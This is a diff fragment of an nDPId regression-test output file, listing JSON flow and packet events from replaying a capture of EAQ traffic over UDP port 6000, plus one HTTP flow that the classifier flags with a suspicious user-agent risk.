00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1432820981681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820981681,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4rIKCAAByMKFQ96sF3AAGCMsAAAAAQAADdwAB\/CBAACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1432820982681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820982681,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4rEKCAAByMKFRM9DF3AAGCE7AAAAAQAADdwACQHZAACQAA=="} @@ -134,58 +134,58 @@ 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1432821011311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432821011311,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR37IKCAAByMKIQ+ptF3AAGKMiAAAAAgAADd4ADGHCAACQAA=="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1432821012311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432821012311,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR0rMKCAAByMKVQoJMF3AAGLfNAAAAAgAADd4ADqg3AACQAA=="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1432821013311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432821013311,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4bIKCAAByMKGQ5x6F3AAGKtOAAAAAgAADd4ADqmHAACQAA=="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949806,"flow_last_seen":1432821014655,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821014655,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950935,"flow_last_seen":1432821015651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821015651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820951932,"flow_last_seen":1432821016651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821016651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820952931,"flow_last_seen":1432821017651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821017651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820953931,"flow_last_seen":1432821018651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821018651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820954931,"flow_last_seen":1432821019651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821019651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820955933,"flow_last_seen":1432821020651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821020651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820956931,"flow_last_seen":1432821021652,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821021652,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957985,"flow_last_seen":1432821022695,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821022695,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959095,"flow_last_seen":1432821023795,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821023795,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821024791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821025791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821026791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821027791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821028791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821029791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821030791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821031791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821032791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821033791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821034791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820957985,"flow_last_seen":1432821044555,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820959035,"flow_last_seen":1432821045664,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949685,"flow_last_seen":1432821035985,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820955933,"flow_last_seen":1432821042151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820950935,"flow_last_seen":1432821037152,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820952931,"flow_last_seen":1432821039151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820958981,"flow_last_seen":1432821045604,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820951932,"flow_last_seen":1432821038152,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 